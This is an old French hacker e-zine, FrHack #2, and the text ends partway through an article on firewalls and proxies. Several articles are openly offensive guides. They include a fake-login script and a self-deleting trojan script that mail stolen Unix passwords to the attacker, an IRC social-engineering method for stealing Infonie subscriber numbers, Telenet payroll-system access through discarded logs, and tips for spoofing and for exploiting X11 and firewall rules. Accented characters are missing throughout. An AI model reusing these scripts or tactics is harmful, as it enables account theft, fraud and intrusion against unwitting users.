Copy Link
Add to Bookmark
Report
FrHack 2
FRHACK # 2
_________ ________
(_________)) (________))
(___________)) (_____)) (_))
(_____))____ (_____))__(_)) ___ ___
(___________)) (__________)) (___) (___)
(_____)) (_____)) (_)) (___)___ _______ ______ (___)___
(_____)) (_____)) (_)) (_______)(_______)( ____)(_______)
(_____)) (_____)) (_)) (___) (_)(___)(__)( (____ (___()__)
(_____)) (_____)) (_)) (___) (_)(_______)(______)(___) (_)
_ _____ ___ ___ _____ ______ ____ __ (_) ____
( __) ( _)(_ ) ( _ ) ( ___) ( _ ) ( ) / _ | ) (__ __ )( \/ ) ) ) (_) ( ) ( __ )( (_) )( / // |
( __)(__)( ) ( ) ( (---) ) ( ) ) _) ( ) (_)( ) /_// /
) (__ )( )( )( )( ) (__( ) )( ( ))( / /__ (_____) (__) (__) (__) (__) (_______) (__) (___) /______\
Irc: Undernet #hack.fr Web: www.frhack.org
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Disclamer
L'quipe de FrHack offre
votre disponibilit un Emag. Ce Emag n'a pour but que d'inform donc nous ne sommes nullement responsables des pertes de donnes informatiques que ces informations pouraient occasionnellement causes, bien ou mal utilises.
Vous introduire sans autorisation dans un autre systeme informatique, changer de quelques manieres que ce soit les fichier que le systeme contient, est totalement illgal, que vous le fassiez consciament ou non. Biensr les textes comprient dans ce Emag peuvent vous montrer
rentrer sur un ordinateur, mais vous devez vous servir de ces textes que pour vous amusez, et combler votre soif de savoir jusqu'au prochain Emag.
galement, aucun des rdacteurs de FrHack ne peut tre blmer des dommages causs, accidentelement ou non,
un ordinateur grce
son article.
De plus, FrHack s'engage
vous fournir le moins possible d'informations errones. Si vous trouvez une informations errones dans les textes qui suivent ce disclamer, dites-vous que l'erreure est humaine, et veuillez nous faire part de cette information fausse.
Le contenu de ce Emag n'est pas decern aux personnes suivantes. Personne travaillant pour le gouvernement, policier, personne travaillant pour un partie politique ou une agence gouvernementale .
En continuant
lire ce Emag, vous agrez entierement
tout ce qui a t nonc ci-dessus et
vous vous engagez
ne pas utiliser les informations contenues dans ce Emag de quelque maniere que ce soit ou qui pourrait entrer en conflit avec la loi.
L'quipe de FrHack vous souhaite une bonne lecture, et espere que vous aprcierez notre Emag.
L'quipe de FrHack
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sommaire
Article Auteur
Underground kthulu
Telenet Snowcrach
Acompte FT gratuit Dr_JI
Spoofing Walla
Hacking de compte Unix Snowcrach
Firewall et Proxy Snowcrach
Peroxyde d'acetone _Franck
Trojan Bismuth
Port Linux Khanabyss
Server SMTP Langly
Slogan FrHack
WeaponX boxe Snowcrach
Password Linux Oktober
Resetter des Password NuClEaR
Configuration de souris sous X Oktober
Conclusion Snowcrach
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Underground
Ici vous ne trouverez pas d'informations techniques mais juste un petit dlire sur la faon dont je conois la scne franaise. Pour commencer, je veux insister sur les difficultes que j'ai eu au dbut, je tenterais d'analyser dans une seconde partie pourquoi la scne franaise est aussi peu dvellope et pour terminer je tenterais de donner quelques bons conseils et liens pour
ceux qui dbutent. Je ne suis pas un dieu en informatique mais en livrant ma propre exprience je pense que a aidera les newbies ! Pour toutes remarques, dsaccord ou au contraire encouragement, n'hsitez pas
m'envoyer un mail, je tacherais d'y rpondre soit en priv
soit par un article ici mme. Vous pouvez aussi me retrouver sur irc UnderNet
#hack.fr.
Le difficile passage de la larve
l'tat de jeune papillon ! En fait tout commence avec la dcouverte d'irc ! On se fait des cybers amis et rapidement on apprend les mots de LaMeR,
newbie ou autres choses dsagrables et qui blessent notre amour propre et on se dit : "et pourquoi je ne sortirais pas de mon cocon moi aussi ?" A partir de l
, on dcouvre l'underground, j'ai de suite tait passionn par ce milieux de gens trs secrets et
avares de conseils. C'est donc tout naturellement que j'ai voulu devenir moi aussi un "HaCkEr", mais le chemin qui mne de jeune internaute
"hacker" est long et sem d'embches !. j'ai commenc par me rendre sur des channels de hack, mais j'ai rapidement t du par le comportement des personnes prsentes sur ce genre de channel. En effet lorsque je posais des
questions, il n'y en avait pas un seul pour me rpondre o alors je me faisais simplement kick et bannir du channel (je ne citerais pas les noms). j'ai galr comme a de dceptions en dceptions jusqu'
ce qu'un jour, on m'a conseill de lire les noroutes. Une petite recherche sur "hack"
aboutie au tlchargement de ces e-mags. Et l
, h joie, h bonheur, j'ai enfin
dcouvert des rponses
mes questions ! Trs vite, ces e-mags devinrent mais livres de chevets. C'est fou tout ce qu'on peux apprendre l
dedans . Les profs oublient un peu trop de choses quand ils font leur cours sur tcp/ip ou autres protocoles. Dans ce genre de magazines, j'y ai aussi appris pourquoi les hackers taient aussi peu bavard. C'est en gros, les difficultes majeures que j'ai eu au dbut (comme beaucoup je suppose). Bien sr, s'ajoute les difficultes de comprhension. NFS, TCP/IP, showmount -e, root, dnsquery, nslookup ... sont des mots bien barbares au dbuts, mais vous verrez,
force de pratique et de
travail on finis par saisir !
Par ce petit paragraphe, je lance un cri de dtresse au hackers "confirms" : les gars il serait sympa de prendre un newbie sous notre aile et l'aider
se faire un place parmis nous au lieu de nous lamenter sans arrt sur le develloppement de la scne franaise. Pour les newbies, comprenez juste qu'ils vous faut insister pour tirez des infos au vieux loups !
Pourquoi tant de haine ?
Je me demandais pourquoi la scne franaise tait aussi peu dvellope et aussi peu active. J'ai deux rponses
proposer : * la premire * Je pense que comme vu dans le paragraphe du dessus, cela vient du fait qu'on a pas envie, ou pas le temps de rpondre aux questions des jeunes qui dbutent, notre attitude doit en dcourager plus d'un. il est clair qu'on ne peux pas
dvoiller notre activit et nos connaissances au premier venu sur un channel irc. Il vaut savoir que les V trainent eux aussi sur les channels de hack dans l'espoir que nous nous dcouvrions, il est donc lgitime de ne pas avoir envie de rpondre quand LaMer nous demande : "Tu as dj
hack un serveur politique ?" Il est clair qu'on ne peux pas savoir si c'est un "jeune" qui veux se
lancer ou si c'est un V qui cherche le mec qui s'est fait le serveur du PCF (mouahahahahaha) ! Le problme et donc de savoir si on peux faire confiance ou non
ce gus ! moi je pense que du moment qu'on ne donne aucune informations personnelles, on peux rpondre
LaMer. Bon ce qui est saolant , c'est aussi le gars qui croit que le hack consiste
envoyer une srie de nuke
pour prouver sa supriorit, je trouve qu'il n'y a rien de plus agaant que de voir s'afficher sur mon cran : "Nuke detect from : XXX.XXX.XXX.XX" le pire c'est que le gus est sous loOzedaube et il croit planter mon shell unix (bon courage !) et que quand on s'interesse de plus prs
sa machine, il a l'option : "ressources partges" qui est valide ! ;) mais bon il faut aussi les
comprendre c'est pas vident de se faire remarquer pour que quelqu'un daigne nous rpondre.
Il est trs frquent de lire dans la presse des articles sur des pirates informatiques qui se sont fait arrter ! On a pas trop envie de se faire "buster" donc on parle au moins de gens possible et en tout cas on parle jamais de nos rsussites ou checs. Pourtant quelle protection on se ferait si on disait : ok les gars, je suis rentrer sur www.victime.com par telles mthodes allez y.
Imaginez un peu la tronche du rewt qui le lendemain matin verrait 50 ou 60 intrusions sur son systme ? Et en plus, aucune intrusion venant du mme endroit ! je peux vous garantir que le gars il cherchera mme pas
savoir si c'est un seul hacker qui a utilis 60 rebonds (que celui qui a 60 rebonds me fasse signe) ou si c'est 60 hackers diffrents ! En plus l'union fait la force dans tous les mecs qui rentrent et qui essaye d'effacer leur traces, y en a un de plus malin que les autres pour ce genre de boulot alors si il pouvait penser aux copains qui sont rentrs avant a aiderait aussi. Bien sur il y a un problme d'thique : je suis sur le serveur qu'est ce que je fais ? ceux qui rpondent :"je le crushe" peuvent partir de suite et inutile de revenir. C'est
cause d'attaques trop bourrines ou qui entrent trop dans la vie prive des gens que les hackers sont diaboliss et dsigns comme les ennemis publics numro 1 du 21ø sicle.
Grosso merdum je dirais que la scne franaise n'est pas bien devellope a cause des encu*** qui font du crushing et par la mme transorment les gentils hackers (mouahahahaha) en vilain pirates. MESSIEURS DE LA DST : NOUS NE SOMMES PAS DES MEURTRIERS ! NOUS SOMMES JUSTE DES PASSIONNES DE SECURITE RESEAU !!!!!!!
* La deuxime * Heuuuuuuu ... ben heu ..... en fait ... je sais plus .... ! envoyer moi votre avis, je le mettrais l
!
Deux trois conseils pour les newbies
Ben en fait : quand vous debarquez sur des channels de hack sur irc, arretez de faire les trisomiques et surtout ne croyez pas que le hack c'est facile.
Un moteur de recherche sympa (mais tout en anglais) : Altalavista
http://194.1.128.27.
Un regroupement de petits progs pour unix aussi bien que pour loOzeDaube : http://www.rootshell.com Un site ou on trouve de tout mais en anglais : http://www.elitehackers.com
Sur irc : UnderNet : #hack.fr
Merci de m'avoir lu bon courage pour les nouveaux sur la scne et bonne continuation aux vieux loups ! Que vous soyez newbies ou vieux loups maillez moi, j'ai besoin de vos conseils !
The FrHack Crew
Kthulu
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Telenet
Prface
Dans ce texte, je vais tent de vous expliquer le principe de Telenet.
Souvent mlanger avec Telnet, ce petit programme devrait tre connu
de tous les pirateurs informatiques.
Telenet
Premierement vous devez trouver un port telenet.
1-800-compagnie-prete-a-se-faire-hacker
1-800-hackermoi
Faite lui une session telenet avec le mode 'No Echo'.
Ca devrait ressembler
a.
Telenet
313 19A
TERMINAL=
Quand vous aller voir le 'prompt' TERMINAL=, taper D1 ou A1.
Le systeme devrait repondre:
@
Vous devrez maintenant taper soit 'C 313 160' ou 'C 312 160'. Cela va imprimer
des caractres double depuis que vous vous etes mit en mode 'No Echo'.
Votre cran devrait afficher:
Telenet
313 19A
TERMINAL=AA22
@CC 331133 116600
313 160 CONNECTED
PASSWORD
XXXXXXXXXXXXX
IIIIIIIIIIIIIIIIIIIIIIIIIIIII
HHHHHHHHHHHHH
Passwords
Meme si le 'Mask' de password est de 12 caractres, ceux-ci seront seulement
de 9 caractres. Le format est le suivant.
N,LNNNNNN
Le chiffre N signifie numrique et le signe L signifie Alphabtique.
La plupart des passwords sont configurs comme ceci:
9,XNNNNNN
Ceux des magasins seront:
8,XNNNNNN
Je doit tre clair, vos chance de trouver le password sont de une sur un milion.
Pour hacker le password, je vous montrerai plus tard.
Maintenant, si votre password est bon ou non, vous verez ceci:
Port = $X25G00 #VC03 ON AT 22:40 CT, 15 DEC 1998
UserID: ?
UserID
Le format du UserID est facilement configurer. La plupart d'entre eux seront:
MS<4 DIGIT STORE NUMBER><2 DIGIT USER NUMBER>
Le User Number commence
01 et vas jusqu'
99, meme si normalement 99 est
rarement choisi.Le Store number User ID devrait etre 'MM' au lieu de 'MS' normalement.
Ca devrait etre:
MM<4DIGIT STORE NUMBER>01
Pour avoir le numro du magasin(Store number) vous n'avez qu'
apeler au magasin.
Celui de Cogeco
Trois-Rivires est 7025. Le Manager ID devrait etre:
MM702501
Un autre ID pourrait etre:
MS702501
Normalement, lorsque l'entrepreneur du systeme as fini de se loguer, le systeme envoie les fichiers logs par imprimante, ce dernier les jetent dans les poubelles de l'entreprise. Vous n'aurez qu'
aller les chercher et vous aurez les password cl pour hacker le systeme.
Programme
Quand tu as le bon User ID et le bon Pasword, et que tu les as rentrer, ca devrait resembler a ceci:
Cogeco Cable LAST LOG-ON AT 22:54 CT, 14 DEC 1998
Programme
Voici quelques programmes avalables:
PNL, TIM, OPR, CHG PAY, PAYROLL, CHG CREW, CASH, DLEGER, BYE, MEET, ACV, BJOB, MAL, RELEASE
CREW REQUEST?
TERM=TERMINATE (FIRE A CREW MEMBER)
Entrer '4' pour un term code
NEW= Ajouter un nouveau membre pour la job title code 660
Le reste du systeme va etre difrent pour chaque, vous devrez vous debrouiller seul. Le programme 'MEET' devrait etre trs utile en vous donnant tous les numros de carte de crdits des personnes qui travaillent pour l'entreprise.
The FrHack Crew
Snowcrash
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Acompte FT gratuit
Qu'est-ce que ISE?
C'est l'Internet Social engeneering.
L'art du social engeneering apliqu
internet en mot clair.
En fait aujourd'hui je vais vous faire part de quelque chose ma fois fort facile
et malgr extremement utile .
Mini-Howto sur comment je fais pour avoir une connexion Infonie :
Plusieurs solutions :
1) Tu payes, c'est pas trop dur (mais cher)
2) Tu demandes
un ami de t'hberg.
3) Tu trouves un moyen de te connect sur le compte de quelqu'un d'autre . C'est cela
qui nous intrresse.
Pour se connecte
Infonie la seule chose dont on a besoin c'est d'un numro
d'abonnement .
Comment trouve des numros d'abonnements
Le numro d'abonement est contenu dans le fichier infonie.ini. Ce dernier ce trouve
dans le rpertoire C:\Windows . On peut toujours demander
quelqu'un de nous
l'envoyer, mais la subtilit, ca compte. C'est la que le social engeneering commence.
Primo : Savoir ou trouver la victime
Je pense que l'IRC est vraiment une cible de choix donc on se connecte sur IRC
et on se rends (ss un faux pseudo qui fait vraiment newbie ) dans un chan qui
regroupe des bouffons de chez infonie (viter les vrai channel de hack car sa
marchera pas ...)
Secondo : Savoir qui choisr comme victime
Vous etes sur un chan comme #warez-france. Chercher des mecs d'infonie qui ne
sont pas op ensuite faite leurs un query et commencer la discution avec ce monsieur.
Tertio : L'art de l'embrouille en quelques lecons
1ere lecon : Qand tu ecris au mec ecrit toujours tout,pas d'abreviations ni de
smileys, vite les fautes d'ortographes.
1ere bis : Repond lentement pour faire voir que tu n'es pas habitu
taper
sur un clavier .
2eme lecon : tale ton ignorance, fait lui sentir qu'il est un dieu du net par
rapport
toi.
3eme lecon : Apres avoir bien noyer le poisson, tu lui demande son infonie.ini
sous une excuse bidon (moi perso j'aime bien les embrouller avec un truc du style
"mon internet explorer refuse de se lancer les mecs du services clients m'ont
dit que sa venait de mon infonie.ini qui est merdique tu peux m'envoyer le tien ?"
4eme lecon : Qand tu l'as remercie le ,salut le et casse toi mais surout NE LUI
DIT PAS QUE TU L'AS NIKE (le moins ils en savent, le mieux c'est. )
Reste plus qu'
te connect avec son numro d'abonnement. (c'est le truc
15 chiffres
quii commence par 199 dans le fichier).
The FrHack Crew
Dr_JI
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Spoofing
Salut Chers Amis
Je me presente, je m'appelle WaLLa et je vous explique
comment faire pour spoofer votre adresse et
ip , cela est trs facile quand vous avez deja
un Ip qui a le port 23 d'ouvert .
J'explique si vous n'avez pas de Ip avec le port 23
d'ouvert ... par exemple si vous voulez que votre
adresse finisse par videotron.net cela est tres
simple vous prenez l'ip de quelqu'un qui a cette
adresse et vous la scanner a l'aider de scan
wingate (tres facile a trouver sur le web faites
une recherche sur yahoo vous allez vite trouver !)
Bon voila je crois avoir t assez precis si vous
avez des questions tout
la fin de ce texte il y
a mes coordonns !! contactez moi si vous vous en
sortez pas !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
==================================================
==================================================
/server <l'ip_du_poulet> 23
/raw <Server> <Port>
/raw nick <Ton_Nick>
/raw user <Ton_id> * * :<Ton_vrai_nom>
==================================================
==================================================
/server ip 23
/raw newbrunswick.nj.us.undernet.org 6664
/raw nick WaLLa
/raw user HONDA * * :Z_RuLeZ
==================================================
==================================================
Les Servers:
==================================================
==================================================
/raw StLouis.MO.US.UnderNet.org 6667
/raw montreal.qu.ca.undernet.org 6667
/raw lulea.se.eu.undernet.org 6667,7000
/raw diemen.nl.eu.undernet.org 6667,6668,6669
/raw caen.fr.eu.undernet.org 6667,6668
/raw amsterdam.nl.eu.undernet.org 6667,6668
/raw panoramix.umh.ac.be 6667
/raw irc.belnet.be 6667
The FrHack Crew
Walla
WaLLaRoo99@Hotmail.com
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Hacking de compte Unix
Prface
Dans ce texte, je vais tenter de vous expliquer comment hacker un acompte Unix.
Cela ne vous permeteras pas de hacker le 'root' alors ne vous faites pas d'ide.
Le Fake Login
Cette maniere est trs simple, mais ne marche que neuf fois sur 10. Cela depends
toujours du niveau de comptence des utilisateurs et de l'administrateur de la Box.
Si vous avez affaire
de vrais dbutants , vos chance de russite sont de deux
cents pour cent.
Le principe est simple. Sous Unix chaque connexion utilise un
terminal qui est en fait un fichier dans le rep '/dev'.
Chaque telnet lanc va utiliser un de ces fichier ttyXX
(XX= numero du terminal).
Faites un 'who' ce qui va lister les utilisateurs connects avec leur
numro de terminal.
% who
[user] [tty] [tmps de connexion]
----- ----- ----------
user1 tty00 12:22
user2 tty01 00:44
user3 tty12 05:14
user4 tty08 01:00
Voici le resultat d'une commande 'who'. On voit bien que chaque user
utilise un terminal spcifique (user1 utilise le tty00) hors, chacun de
ces terminaux est en fait un fichier /dev/ttyXX, ainsi vous pouvez
crire sur ces fichiers ce qui s'affichera directement sur l'cran du
user qui utilise ce terminal.
Voici donc ce que nous allons faire.
On va executer un script shell qui simule un Reboot du serveur
et demandera
l'utilisateur son Login et Password
nouveau.
Voici le script
ralis.
#~/fakelogin.sh
# Ca doit ressembler au reboot du Server
echo "Broadcast message from root...."
echo " "
echo "Digital UNIX (machine.server.fr) (tty00)"
echo " "
echo "login: \c"
read lgin
echo off
echo "Password: \c"
read pw
echo " "
echo on
# (Votre mail)
echo "Login: $lgin - Pword: $pw" | mail (votre mail)
# fin du script
Maintenant, copier ce script dans un fichier fakelogin.sh (placer dans vote
homedir). Il vous suffira de faire en sorte que ce script
ressemble
votre Login et de mettre votre email puis de
tapez:
% cat fakelogin.sh >/dev/ttyXX
(remplacer ttyXX par le terminal
hacker).
Ensuite vous aller recevoir un email vous indiquant le login et le mot de passe
de l'utilisateur.
Le fichier Password
videment le plus simple pour hacker une machine Unix est de lire
directement tous les mots de passes la o ils sont crit (c'est
dire
dans /etc/passwd) mais la plus part du temp vous imaginez bien
que l'admin ne laisse pas ce fichier en lecture. Ou il est
encode . Donc vous pouvez toujours essayer:
% cat /etc/passwd | more
Ca m'etonnerai que ca marche ou alors c'est que vous avez de la
chance . Attention aux fausses joies car bien souvent le fichier passwd est
encode. C'est
dire que le fichier peut tre lu mais les mots de
pass sont remplaces par des '*' et les vrais pass sont dans un autre
fichier qui lui n'est lisible que par le root.
Permission sur les HomeDir
Pourquoi ne pas profiter de l'oubli d'un utilisateur pour lui
hacker son compte. Aller dans le repetoir des /usr et tapez:
% ls -l | more
Ce qui listera tous les comptes avec les permissions:
Rappel:
les permissions sur unix se font de la maniere suivante:
r = read
w = write
x = execute
-rwxr-xr-x signifie: -rwx (owner) r-x (group) r-x (all).
Soit que ce fichier est en lecture/ecritur/exec pour le propritaire
et en lectur/exec pour les autres.
Si il y a un 'd' devant cela signifie qu'il s'agit d'un repetoire.
bon voici un exemple de resultat affiche apres un 'ls -l' dans /usr
[permissions][user][date] [size]
------------ ---- ---- -----
drwxr-xr-x bob 1998 21
drwxr-xr-x bill 1998 11
drwxr-xr-x Zoe 1997 05
drwxrwxrwx fila667 1998 32
drwxr-xr-x Monic 1997 29
On voit que le homedir de fila667 est en drwxrwxrwx c'est
dire que
vous pouvez non seulement le lire mais aussi y cire. Si vous tes
chanceux, L'utilisateur Fila667 auras laiss son repertoire en mode
criture.
Vous pouvez donc installer tranquillement un petit script dans le repertoire
de fila667 de maniere
ce que celui ci l'xecute et vous donne son mot
de passe. Sachez faire en sorte que fila667 xecute ce script et aussi
qu'il ne se rende pas compte qu'il est en train de lancer de lui meme
un cheval de troie. Le mieux serait de mettre un procder d'auto-destruction
pour ne laisser aucune trace.
Voici un exemple de script
placer dans le repertoire de Fila667.
#!/usr/homedir/SECURITY
echo " "
echo " SECURITY DAEMON "
echo " "
echo " The security Daemon has locate that your "
echo " password is unsecure please change it now!"
echo " "
echo "old Password: \c"
read pw
echo " "
echo "New Password: \c"
echo " "
echo "Thank you "
echo on
# (votre email)
echo "Pword: $pw" | mail (votre email)
# efface le script
rm -f SECURITY
# fin du script
Une fois que vous avez configurer ce script copier le chez fila667
et rendez le executable:
% cp SECURITY /usr/fila667
% chmod u+x /usr/fila667/SECURITY
Et voila le pauvre fila667 une fois de plus en croyant bien faire c'est
fait voler son mot de passe.
The FrHack Crew
Snowcrach
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Firewall et Proxy
Prface
Dans ce texte, je vais tenter de vous expliquer le fonctionnement des firewalls.
Ils servent
deux choses. Protger le reseau interne contre les tentatives d'intruision
venant de l'extrieur. Le principe du Firewall est trs simple.A l'origine un firewall
est un systme comportant deux interfaces rseau. Pour la suite on prendra le premier cas , celui ou l'on souhaite protger tout le rseau local. On a en fait une interface interne relie au rseau local et une interface externe relie
Internet. L'ordinateur firewall peut atteindre
la fois le rseau protg et Internet. Le rseau protge ne peut atteindre Internet et Internet ne peut toucher le rseau protge.
Firewall et Routeur IP
Le routeur prend en charge les paquets jusqu'
la couche IP. Le routeur transmet chaque paquet en fonction de l'adresse de destination du paquet et de la route vers la destination prcise dans la table de routage. Par contre le firewall ne transmet pas les paquets. Le pare-feu accepte les paquets et les prend en charge jusqu'
la couche application.
Types de Firewalls
Filtres de paquets
Un firewall de ce type inspecte tous les paquets qu'il recoie et regarde s'ils correspondent aux rgles pralablement tablis. S'il respecte les rgles il est accept, sinon il est rejet. Les critres des rgles peuvent tre par exemple l'adresse IP, les ports sources et destination contenu dans les paquets.
Les Proxy
Lorsqu'un firewall de type proxy est utilis sur un rseau, il n'y a aucune connexion directe entre les systmes du rseau local et le rseau Internet. Les machines internes se connectent en fait au firewall pour lui demander un service. Aprs le FW se charge de relayer la requte au serveur Internet puis de renvoyer la rponse au client interne.
Filtres de paquets
La technologie de filtre de paquets est incluse dans le noyau de Linux . Le filtre doit agir dans la pile IP du systme . Pour utiliser cette technique vous allez devoir une fois de plus recompiler le noyau et rpondre YES aux questions suivantes:
IP: forwarding/gatewaying (CONFIG_IP_FORWARD) YES
IP: firewalling (CONFIG_IP_FIREWALL) YES
IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE) YES
Le noyau compil , install , redmarr vous allez tre en mesure de configur le FW.
Pour cela on va utilis ipfadm .
La syntaxe gnrale est:
ipfwadm-A commande paramtres [options]
ipfwadm -I commande paramtres [options]
ipfwadm -O commande paramtres [options]
ipfwadm -F commande paramtres [options]
ipfwadm -M [-l ou -s] [options]
Comme vous venez de le voir il y a cinq catgories:
-A configuration de l'accounting (compatibit des paquets atteignant le systme) .
-I rgles
appliquer aux paquets TCP/IP en entre .
-O rgles
appliquer aux paquets TCP/IP en sortie .
-F rgles
appliquer aux paquets TCP/IP
router d'une interface
une autre .
-M administration de l'IP Masquerading.
Perso je pourrais vous parler que des categories I , O , F , M.
ipfwadm possde de trs nombreuses options que je vais pas dcrire ici par ce j'ai pas envie. Lisez la doc Linux .
Avant de crer toute rgles de filtre IP , vas falloir dfinir des rgles de scurit .
Par exemple pour ma machine on va dire:
Toute connexion du rseau internet vers une machine interne est interdite .
De extrieur , on doit avoir accs au serveur de messagerie et au service DNS du firewall .
On va dire qu'on a un rseau interne de type 193.1.1.0/24 et qu'on est reli
un sous rseau de type 193.1.2.0/24 (entre le FW et le routeur) . Le FW ayant pour adresse 193.1.1.254 en interne (eth0) et 193.1.2.1 en externe (eth1) .
Je vais maintenant dire quelques uns des filtres que j'applique
-ipfwadm -O -p accept
La rgle par dfaut des paquets en sortie est accept (-p reprsente l'action par dfaut)
- ipfwadm -I -p deny
La rgle par dfaut des paquets en entre est deny .
-ipfwadm -F -p deny
La rgle par dfaut des paquets
router en entre est deny .
-ipfwadm -F -a accept -S 193.1.1.0/24 -D0/0 -P tcp
Autorisation pour router tous les paquets TCP provenant de l'extrieur .
-ipfwadm -I -a deny -S 193.1.1.0/24 -D0/0 -W eth1
Cette commande sert
lutter contre le SPOOFING (changer son adresse IP) en effet cette rgle dit que tous les paquets qui rentrent dans le sous rseau scuris et qui ont une adresse source correspondant
une adresse du sous rseau (ce qui n'est pas logique) doivent tre rejet!
-ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 53
-ipfawadm -I -a accept -P tcp -S0/0 -D 193.2.1.1 53
Ces mesures disent que les accs au serveur DNS (port 53) sont accessible de n'importe o .
-ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 25
Accs au serveur SMTP du firewall de n'importe o .
Malheureusement on retrouve l
le plus grand inconvenient des FW . En effet dans l'tat actuelle systme on ne pourra pas faire fonctionner un client FTP du rseau interne avec un serveur situ
l'extrieur .
Le protocole FTP prvoit l'tablissement d'une connexion du serveur FTP vers le client (du port 20 -> port > 1024)
Mais il y a des solutions .
- Utiliser le client FTP en mode passif (A ce moment le client tablit une connexion vers le serveur ftp)
- Utiliser un proxy(voir section suivante) install sur le FW qui relaiera les requtes de l'intrieur vers extrieur .
- Utiliser l'IP masquerading .
- Ou alors rajouter cette rgle
ipfwadm -F -a accept -P tcp -S0/0 20 -D 193.1.1.0/24 1024-65535
Remarque intressante: Si vous tombez sur un systme avec une rgle de ce type , vous pouvez en profitez , en effet cette rgle expose les services du rseau interne qui coutent sur un port >1024 . A partir de la vous avez plus qu'a fait partir un paquet du port 20 de votre machine vers un service . Beaucoup de services tournent sur ce port .
Par exemple pour sur les ports 6000vous avez les services X-Windows . S'ils n'ont pas ete protege correctement vous pouvez voir ce que fait l'utilisateur. Vous pouvez memes voir les toubhes frappees , les programmes lancees. Si vous faites telnet dessus vous aurez je pense l'effet d'un denial of service; l'ecran va se geler , le sys va ralentir ... Mais il y a plus mieux.
Si vous vous y connaissez un peu en programmation utilisez la fonction XOpenDisplay() , si la fonction retourne NULL alors c'est securise sinon ...
char *hostname;
if (XOpenDisplay(hostname) == NULL) {
printf("Loupe : %s\n", hostname);
} else {
printf("Ca marche : %s\n", hostname);
}
Il y a a autre chose auquel il faut penser . Normalement la route qu'emprunte un paquet de sa source
sa destination est determinee par les routeurs qui se trouvent entre eux. En fonction de l'adresse de destination et de leur table les routeurs se chargent de dirigier les paquets . Mais dans une trame TCP/IP, il y a une option qui porte le nom de ®source routing¯ qui est peu utilisee. En fait on l'utilise dans le debuggage des reseaux pour trouver les problmes. Le truc c'est que si vous envoyez un paquet en faisant croire qu'il vient de l'interieur, normalement les routeurs ne devrait pas l'ammener au FW mais le probleme la c'est qu'ils le font avec cette option. En plus c'est pas dificile a faire. Mais normalement il y a des options pour desactiver le ®source routing¯ .
Masquerading
C'est une technique de plus en plus utilise . Elle consiste
masquer totalement l'adressage IP du rseau interne ( On peut donc utiliser des adresses IP prives ) . Ainsi chaque paquet qui traverse le firewall est modifi pour faire croire qu'il n'y a qu'un seul systme connect . Tout le rseau interne partage ainsi l'adresse IP (externe) du FW .
Installation:
Bon beh va falloir recompiler le noyau et rpondre YES aux questions:
IP: forwarding/gatewaying (CONFIG_IP_FORWARD)
IP: firewalling (CONFIG_IP_FIREWALL)
IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)
IP: masquerading (CONFIG_IP_MASQUERADE)
IP: ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP)
Maintenant vous allez tre en mesure d'utiliser une autre des 5 options d'ipfwadm: l'option -M .
Pour cela utiliser l'option -l qui liste les connexions qui utilisent l'IP masquerading et -s qui fixe le timeout .
Pour autoriser le masquerading il faudra les rgles suivantes
- ipfwadm -F -p deny
- ipfwadm -F -a masquerade -S 192.10.10.0/24 -D0/0
Les Proxy
D'aprs ce que j'ai lu et ce qu'on m'a dit la meilleure solution pour utiliser une machine Linux en proxy consiste
utiliser l'ensemble d'outils qu'offre TIS .
Ils fournissent un package connu sous le nom de FW toolkit . Vous pouvez le telecharger sur le site Web de TIS
http://www.tis.com/docs/products/fwtk/index.html
Installation
Bon comme vous allez tre un Proxy , il va falloir forcement dsactiver la fonction de routeur de Linux . Pour cela on recompile le noyau en rpondant NO au forwarding/gatewaying (CONFIG_IP_FORWARDING) . Vous tes pas oblig de mettre cette option mais si vous ne le faites pas les machines du rseau interne seraient directement accessibles de l'extrieur
travers les possibilits du FW .
Si l'IP forwarding est laisse , alors la il y a une faille mais la je connais pas du tout ,en fait la solution serait de downer le firewall , ainsi le FW ne marcherait plus mais le noyau lui continuerait a router les paquets sans suivre les rgles! Pour a , il y a des solutions diverses et pas trs gentilles comme le SYN flooding et autres attaques barbares .
Bon vous compilez les outils TIS en suivant les instructions .
Configuration
La table netperm rside dans le fichier /usr/local/etc/netprem-table . Cette table dcrit la configuration principale de tous les composants du Trusted Firewall Toolkit . Quand une des applications est lance elle va chercher sa config dans cette table
Description
-Netacl: Cette application permet de donner l'accs aux diffrents services TCP . Ce programme se dmarre depuis le super-dmon inetd .
Si par exemple on ajoute au fichier /etc/inetd.conf
telnet stream tcp nowait root /usr/local/etc/netacl telnetd
Avec ca quand une requte atteint le port ftp du systme netacl se dmarre avec comme paramtre telnetd . Mais avant que le dmon soit lance le logiciel vrifie que la requte est valide selon la table . Par exemple si je veux autorise aux personnes de mon rseau interne de se connecter au telnet du FW faudra ajouter:
netacl-telnetd: permit-hosts 193.1.1.* -exec /usr/sbin/in.telnetd
(note 193.1.1.* quivaut
193.1.1.0/24)
Aprs on a aussi tous les logiciels qui implementent un relais pour les services .
En fait le client fait d'abord une requte au service du FW puis de la fait une requte pour se connecter au site extrieur . Selon les rgles du proxy cette connexion sera refuse ou accepte .
-tn-gw: relais pour le service telnet .
-ftp-gw: relais pour le service ftp .
-rlogin-gw: relais pour le proxy rlogin .
